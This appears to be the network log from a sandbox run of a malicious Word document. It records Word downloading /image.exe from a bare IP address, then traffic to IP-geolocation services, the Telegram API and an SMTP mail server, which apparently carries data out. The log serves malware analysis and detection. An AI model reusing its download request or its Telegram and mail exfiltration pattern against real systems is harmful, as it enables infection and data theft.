Jan 7, 2025 13:25:39.902899981 CET	49960	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:39.903850079 CET	49974	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:39.907974005 CET	80	49960	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:39.908819914 CET	80	49974	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:39.908915043 CET	49960	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:39.908948898 CET	49974	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:39.909090996 CET	49974	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:39.913860083 CET	80	49974	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:40.014246941 CET	443	49968	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:40.016043901 CET	49968	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:40.016064882 CET	443	49968	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:40.157871962 CET	443	49968	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:40.158056974 CET	443	49968	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:40.158119917 CET	49968	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:40.158505917 CET	49968	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:40.162889004 CET	49961	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:40.164549112 CET	49975	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:40.169337988 CET	80	49961	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:40.169395924 CET	49961	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:40.169471025 CET	80	49975	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:40.169533014 CET	49975	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:40.169658899 CET	49975	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:40.175919056 CET	80	49975	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:40.722276926 CET	80	49974	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:40.723649025 CET	49981	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:40.723686934 CET	443	49981	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:40.723742008 CET	49981	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:40.724020958 CET	49981	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:40.724030018 CET	443	49981	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:40.772310972 CET	49974	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:40.973520041 CET	80	49975	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:40.974776983 CET	49982	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:40.974826097 CET	443	49982	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:40.974919081 CET	49982	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:40.975171089 CET	49982	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:40.975183010 CET	443	49982	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:41.022372007 CET	49975	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:41.179389954 CET	443	49981	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:41.180973053 CET	49981	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:41.180989027 CET	443	49981	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:41.317445993 CET	443	49981	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:41.317614079 CET	443	49981	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:41.318712950 CET	49981	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:41.319221020 CET	49981	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:41.352235079 CET	49974	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:41.353082895 CET	49986	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:41.353111029 CET	443	49986	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:41.353187084 CET	49986	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:41.353619099 CET	49986	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:41.353632927 CET	443	49986	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:41.357181072 CET	80	49974	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:41.357243061 CET	49974	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:41.428178072 CET	443	49982	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:41.430039883 CET	49982	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:41.430073023 CET	443	49982	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:41.505356073 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:41.515434027 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:41.515649080 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:41.579601049 CET	443	49982	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:41.579675913 CET	443	49982	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:41.579873085 CET	49982	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:41.580430984 CET	49982	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:41.583842039 CET	49975	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:41.585706949 CET	49990	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:41.590523958 CET	80	49975	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:41.590662003 CET	49975	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:41.592364073 CET	80	49990	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:41.592540979 CET	49990	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:41.592750072 CET	49990	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:41.599252939 CET	80	49990	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:41.965075970 CET	443	49986	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:41.965322018 CET	49986	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:41.966845036 CET	49986	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:41.966862917 CET	443	49986	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:41.967128038 CET	443	49986	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:41.968565941 CET	49986	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:42.015326977 CET	443	49986	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:42.084903955 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.085587978 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:42.090377092 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.243477106 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.243674994 CET	443	49986	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:42.243771076 CET	443	49986	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:42.243871927 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:42.243892908 CET	49986	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:42.246143103 CET	49986	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:42.248696089 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.391459942 CET	80	49990	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:42.392750978 CET	49996	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:42.392784119 CET	443	49996	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:42.392863035 CET	49996	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:42.393085003 CET	49996	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:42.393098116 CET	443	49996	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:42.406136990 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.406461954 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:42.411259890 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.444180965 CET	49990	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:42.575987101 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.576006889 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.576020002 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.576030970 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.576041937 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.576066017 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:42.576098919 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:42.593221903 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:42.598028898 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.751749039 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.755976915 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:42.764978886 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.851432085 CET	443	49996	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:42.860289097 CET	49996	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:42.860313892 CET	443	49996	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:42.931330919 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.963494062 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:42.968374968 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:42.997205973 CET	443	49996	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:42.997272968 CET	443	49996	188.114.97.3	192.168.2.5
Jan 7, 2025 13:25:42.997478962 CET	49996	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:42.997709990 CET	49996	443	192.168.2.5	188.114.97.3
Jan 7, 2025 13:25:43.028775930 CET	49990	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:43.029555082 CET	50001	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:43.029584885 CET	443	50001	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:43.029650927 CET	50001	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:43.030119896 CET	50001	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:43.030131102 CET	443	50001	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:43.033941984 CET	80	49990	132.226.8.169	192.168.2.5
Jan 7, 2025 13:25:43.034024000 CET	49990	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:43.115632057 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:43.119878054 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:43.124706030 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:43.273032904 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:43.273294926 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:43.278103113 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:43.425537109 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:43.425821066 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:43.430588007 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:43.578298092 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:43.578664064 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:43.583467960 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:43.659643888 CET	443	50001	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:43.659713984 CET	50001	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:43.661066055 CET	50001	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:43.661072969 CET	443	50001	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:43.661336899 CET	443	50001	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:43.662725925 CET	50001	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:43.707321882 CET	443	50001	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:43.732212067 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:43.732503891 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:43.737334013 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:43.886168957 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:43.886610031 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:43.891463041 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:43.911689043 CET	443	50001	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:43.911768913 CET	443	50001	149.154.167.220	192.168.2.5
Jan 7, 2025 13:25:43.911942959 CET	50001	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:43.914707899 CET	50001	443	192.168.2.5	149.154.167.220
Jan 7, 2025 13:25:44.050885916 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:44.053968906 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:44.054028988 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:44.054058075 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:44.054073095 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:44.059138060 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:44.060213089 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:44.208895922 CET	587	49989	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:44.256658077 CET	49989	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:48.147670031 CET	49886	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:48.384509087 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:48.389286995 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:48.389507055 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:48.942564011 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:48.942774057 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:48.948213100 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.093192101 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.093908072 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:49.098764896 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.252965927 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.253396034 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:49.262150049 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.410372019 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.410386086 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.410398006 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.410407066 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.410418034 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.410552979 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:49.412780046 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:49.417578936 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.564126015 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.567982912 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:49.572778940 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.722359896 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.726325989 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:49.731738091 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.776406050 CET	49904	80	192.168.2.5	132.226.8.169
Jan 7, 2025 13:25:49.877177954 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.878231049 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:49.883085012 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.985805035 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:49.990636110 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:49.991403103 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.029015064 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.031599045 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.037205935 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.182100058 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.183453083 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.188293934 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.334090948 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.337513924 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.342322111 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.489819050 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.490155935 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.495795965 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.536334991 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.536638021 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.541465998 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.642431974 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.642735958 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.647576094 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.684482098 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.684700966 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.689450979 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.805680037 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.806489944 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.806595087 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.806670904 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.806670904 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.811409950 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.811743021 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.811754942 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.811764002 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.846302986 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:50.846932888 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:50.851735115 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.001688957 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.001701117 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.001710892 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.001720905 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.001733065 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.001846075 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:51.004494905 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:51.009233952 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.053534985 CET	587	50037	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.100486040 CET	50037	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:51.154474020 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.157541990 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:51.164171934 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.305629015 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.307882071 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:51.313191891 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.456505060 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.458628893 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:51.474422932 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.618940115 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.619170904 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:51.624515057 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.767389059 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.767988920 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:51.772866964 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.918325901 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:51.918601990 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:51.923401117 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:52.068133116 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:52.068511009 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:52.073367119 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:52.218661070 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:52.218827009 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:52.223685026 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:52.380795002 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:52.381550074 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:52.381550074 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:52.381550074 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:52.381550074 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:25:52.386456013 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:52.386465073 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:52.386473894 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:52.386482954 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:52.638796091 CET	587	50048	208.91.198.176	192.168.2.5
Jan 7, 2025 13:25:52.694210052 CET	50048	587	192.168.2.5	208.91.198.176
Jan 7, 2025 13:26:04.613267899 CET	49710	80	192.168.2.5	147.124.216.113

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 13:25:02.306466103 CET	56137	53	192.168.2.5	1.1.1.1
Jan 7, 2025 13:25:02.317892075 CET	53	56137	1.1.1.1	192.168.2.5
Jan 7, 2025 13:25:09.719969034 CET	62677	53	192.168.2.5	1.1.1.1
Jan 7, 2025 13:25:09.726752043 CET	53	62677	1.1.1.1	192.168.2.5
Jan 7, 2025 13:25:18.312735081 CET	56207	53	192.168.2.5	1.1.1.1
Jan 7, 2025 13:25:18.321296930 CET	53	56207	1.1.1.1	192.168.2.5
Jan 7, 2025 13:25:34.115472078 CET	65493	53	192.168.2.5	1.1.1.1
Jan 7, 2025 13:25:34.122328043 CET	53	65493	1.1.1.1	192.168.2.5
Jan 7, 2025 13:25:41.218493938 CET	54254	53	192.168.2.5	1.1.1.1
Jan 7, 2025 13:25:41.504635096 CET	53	54254	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 13:25:02.306466103 CET	192.168.2.5	1.1.1.1	0xe9e5	Standard query (0)	amazonenviro.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:09.719969034 CET	192.168.2.5	1.1.1.1	0x3176	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:18.312735081 CET	192.168.2.5	1.1.1.1	0x2035	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:34.115472078 CET	192.168.2.5	1.1.1.1	0xe09e	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:41.218493938 CET	192.168.2.5	1.1.1.1	0x2756	Standard query (0)	mail.techniqueqatar.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 13:25:02.317892075 CET	1.1.1.1	192.168.2.5	0xe9e5	No error (0)	amazonenviro.com		166.62.27.188	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:09.726752043 CET	1.1.1.1	192.168.2.5	0x3176	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 13:25:09.726752043 CET	1.1.1.1	192.168.2.5	0x3176	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:09.726752043 CET	1.1.1.1	192.168.2.5	0x3176	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:09.726752043 CET	1.1.1.1	192.168.2.5	0x3176	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:09.726752043 CET	1.1.1.1	192.168.2.5	0x3176	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:09.726752043 CET	1.1.1.1	192.168.2.5	0x3176	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:18.321296930 CET	1.1.1.1	192.168.2.5	0x2035	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:18.321296930 CET	1.1.1.1	192.168.2.5	0x2035	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:34.122328043 CET	1.1.1.1	192.168.2.5	0xe09e	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:25:41.504635096 CET	1.1.1.1	192.168.2.5	0x2756	No error (0)	mail.techniqueqatar.com		208.91.198.176	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

147.124.216.113

amazonenviro.com

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	147.124.216.113	80	1892	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:24:59.342294931 CET	182	OUT	GET /image.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 147.124.216.113
